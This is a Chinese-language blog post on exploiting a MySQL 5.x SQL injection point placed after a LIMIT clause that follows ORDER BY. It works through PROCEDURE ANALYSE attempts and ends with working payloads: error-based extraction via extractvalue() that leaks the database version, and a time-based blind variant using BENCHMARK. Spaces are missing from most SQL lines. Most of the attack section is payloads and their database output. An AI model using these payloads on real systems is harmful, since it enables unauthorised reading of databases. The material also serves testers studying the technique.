Mysql注入点在limit关键字后面的利用方法

描写sql注入利用方法的文章数不胜数，本文将描述一种比较特殊的场景。

细节

在一次测试中，我碰到了一个sql注入的问题，在网上没有搜到解决办法，当时的注入点是在limit关键字后面，数据库是MySQL5.x,SQL语句类似下面这样：

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 【注入点】

问题的关键在于，语句中有order by 关键字，我们知道，mysql 中在order by 前面可以使用union 关键字，所以如果注入点前面没有order by 关键字，就可以顺利的使用union 关键字，但是现在的情况是，注入点前面有order by 关键字，这个问题在stackoverflow 上和sla.ckers上都有讨论，但是都没有什么有效的解决办法。

我们先看看 mysql 5.x 的文档中的 select 的语法：

SELECT
[ALL|DISTINCT|DISTINCTROW] 
[HIGH_PRIORITY] 
[STRAIGHT_JOIN] 
[SQL_SMALL_RESULT][SQL_BIG_RESULT][SQL_BUFFER_RESULT] 
[SQL_CACHE|SQL_NO_CACHE][SQL_CALC_FOUND_ROWS] 
select_expr[,select_expr...] 
[FROMtable_references 
[WHEREwhere_condition] 
[GROUPBY{col_name|expr|position} 
[ASC|DESC],...[WITHROLLUP]] 
[HAVINGwhere_condition] 
[ORDERBY{col_name|expr|position} 
[ASC|DESC],...] 
[LIMIT{[offset,]row_count|row_countOFFSEToffset}] 
[PROCEDUREprocedure_name(argument_list)] 
[INTOOUTFILE'file_name'export_options 
|INTODUMPFILE'file_name'
|INTOvar_name[,var_name]] 
[FORUPDATE|LOCKINSHAREMODE]] 

limit 关键字后面还有 PROCEDURE 和 INTO 关键字，into 关键字可以用来写文件，但这在本文中不重要，这里的重点是 PROCEDURE 关键字.MySQL默认可用的存储过程只有 ANALYSE (doc)。

尝试用这个存储过程：

mysql>SELECTfieldFROMtablewhereid>0ORDERBYidLIMIT1,1PROCEDUREANALYSE(1); 
ERROR1386(HY000):Can'tuseORDERclausewiththisprocedure

ANALYSE支持两个参数，试试两个参数：

mysql>SELECTfieldFROMtablewhereid>0ORDERBYidLIMIT1,1PROCEDUREANALYSE(1,1); 
ERROR1386(HY000):Can'tuseORDERclausewiththisprocedure

依然无效，尝试在 ANALYSE 中插入 sql 语句：

mysql>SELECTfieldfromtablewhereid>0orderbyidLIMIT1,1procedureanalyse((selectIF(MID(version(),1,1)LIKE5,sleep(5),1)),1); 

响应如下：

ERROR1108(HY000):Incorrectparameterstoprocedure'analyse’

事实证明，sleep 没有被执行，最终，我尝试了如下payload ：

mysql>SELECTfieldFROMuserWHEREid>0ORDERBYidLIMIT1,1procedureanalyse(extractvalue(rand(),concat(0x3a,version())),1); 
ERROR1105(HY000):XPATHsyntaxerror:':5.5.41-0ubuntu0.14.04.1'

啊哈，上面的方法就是常见的报错注入，所以，如果注入点支持报错，那所有问题都ok，但是如果注入点不是报错的，还可以使用 time-based 的注入，payload 如下：

SELECTfieldFROMtableWHEREid>0ORDERBYidLIMIT1,1PROCEDUREanalyse((selectextractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1)LIKE5,BENCHMARK(5000000,SHA1(1)),1))))),1) 

有意思的是，这里不能用sleep而只能用 BENCHMARK。

另外，这里还有一种类似的方法 https://rdot.org/forum/showpost.php?p=36186&postcount=30